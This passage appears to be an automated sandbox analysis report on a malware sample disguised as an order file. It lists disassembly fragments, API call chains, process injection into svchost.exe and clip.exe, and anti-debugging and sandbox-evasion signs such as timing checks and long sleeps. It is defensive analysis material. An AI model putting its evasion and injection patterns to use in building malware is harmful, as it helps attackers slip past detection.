Source: MV Sunshine, ORDER.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: MV Sunshine, ORDER.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009FC304 LoadLibraryA,GetProcAddress,

0_2_009FC304

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009E8719 push FFFFFF8Bh; iretd	0_2_009E871B
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009AE94F push edi; ret	0_2_009AE951
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009AEA68 push esi; ret	0_2_009AEA6A
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009A8B85 push ecx; ret	0_2_009A8B98
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009AEC43 push esi; ret	0_2_009AEC45
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009AED2C push edi; ret	0_2_009AED2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004031C0 push eax; ret	1_2_004031C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004161D3 push ecx; ret	1_2_004162EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004162CC push ecx; ret	1_2_004162EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417356 push ebx; retf	1_2_00417359
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416338 push ecx; ret	1_2_004162EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004083DA push es; ret	1_2_004083DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040BBEC pushad ; iretd	1_2_0040BBEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418577 push 2823B84Bh; retf	1_2_00418587
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417D38 push ecx; iretd	1_2_00417D39
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf	1_2_00401EDE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411E39 push esp; ret	1_2_00411E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf	1_2_00401EDE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039309AD push ecx; mov dword ptr [esp], ecx	1_2_039309B6
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D68202 push FFFFFFB8h; retf	2_2_02D68204
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D6D0E9 push ecx; iretd	2_2_02D6D0EA
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D62854 push 2823B84Bh; retf	2_2_02D62864
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D62015 push ecx; iretd	2_2_02D62016
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D68181 push edi; ret	2_2_02D68182
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D5C116 push esp; ret	2_2_02D5C11E
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D55EC9 pushad ; iretd	2_2_02D55ECB
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D526B7 push es; ret	2_2_02D526BB
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D61633 push ebx; retf	2_2_02D61636
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D68CBA push edx; ret	2_2_02D68CD6
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_047D27FA pushad ; ret	3_2_047D27F9
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_047D225F pushad ; ret	3_2_047D27F9

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_00984A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00984A35
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_00A055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00A055FD

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009A33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_009A33C7

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	API/Special instruction interceptor: Address: 2223254
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0397096E rdtsc

1_2_0397096E

Source: C:\Windows\SysWOW64\clip.exe

Window / User API: threadDelayed 9720

Jump to behavior

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-99839

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	API coverage: 4.7 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\clip.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\clip.exe TID: 7688	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 7688	Thread sleep time: -506000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 7688	Thread sleep count: 9720 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 7688	Thread sleep time: -19440000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe TID: 7804	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe TID: 7804	Thread sleep time: -43500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe TID: 7804	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe TID: 7804	Thread sleep time: -37000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\clip.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\clip.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009E4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_009E4696
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_009EC9C7
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009EC93C FindFirstFileW,FindClose,	0_2_009EC93C
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009EF200
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009EF35D
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009EF65E
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009E3A2B
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009E3D4E
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009EBF27
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028CBC20 FindFirstFileW,FindNextFileW,FindClose,	3_2_028CBC20

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_00984AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00984AFE

Source: QAjjirwAoAEExvw.exe, 00000007.00000002.4133260511.00000000011FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: clip.exe, 00000003.00000002.4132740210.0000000002A55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: firefox.exe, 00000008.00000002.2165854586.000001B39686C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0397096E rdtsc

1_2_0397096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_004173E3 LdrLoadDll,

1_2_004173E3

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009F41FD BlockInput,

0_2_009F41FD

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_00983B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00983B4C

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009B5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_009B5CCC

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009FC304 LoadLibraryA,GetProcAddress,

0_2_009FC304

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_022234C0 mov eax, dword ptr fs:[00000030h]	0_2_022234C0
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_02223520 mov eax, dword ptr fs:[00000030h]	0_2_02223520
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_02221E70 mov eax, dword ptr fs:[00000030h]	0_2_02221E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]	1_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]	1_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]	1_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]	1_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]	1_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]	1_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395438F mov eax, dword ptr fs:[00000030h]	1_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395438F mov eax, dword ptr fs:[00000030h]	1_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EC3CD mov eax, dword ptr fs:[00000030h]	1_2_039EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]	1_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]	1_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]	1_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]	1_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B63C0 mov eax, dword ptr fs:[00000030h]	1_2_039B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039663FF mov eax, dword ptr fs:[00000030h]	1_2_039663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]	1_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]	1_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]	1_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]	1_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]	1_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]	1_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]	1_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]	1_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392C310 mov ecx, dword ptr fs:[00000030h]	1_2_0392C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03950310 mov ecx, dword ptr fs:[00000030h]	1_2_03950310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]	1_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]	1_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]	1_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]	1_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]	1_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]	1_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B035C mov ecx, dword ptr fs:[00000030h]	1_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]	1_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]	1_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FA352 mov eax, dword ptr fs:[00000030h]	1_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]	1_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039D437C mov eax, dword ptr fs:[00000030h]	1_2_039D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h]	1_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h]	1_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]	1_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]	1_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]	1_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h]	1_2_039402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h]	1_2_039402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]	1_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]	1_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]	1_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]	1_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]	1_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]	1_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]	1_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]	1_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392823B mov eax, dword ptr fs:[00000030h]	1_2_0392823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392A250 mov eax, dword ptr fs:[00000030h]	1_2_0392A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03936259 mov eax, dword ptr fs:[00000030h]	1_2_03936259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B8243 mov eax, dword ptr fs:[00000030h]	1_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B8243 mov ecx, dword ptr fs:[00000030h]	1_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]	1_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]	1_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]	1_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]	1_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]	1_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]	1_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]	1_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]	1_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]	1_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]	1_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]	1_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]	1_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]	1_2_03934260
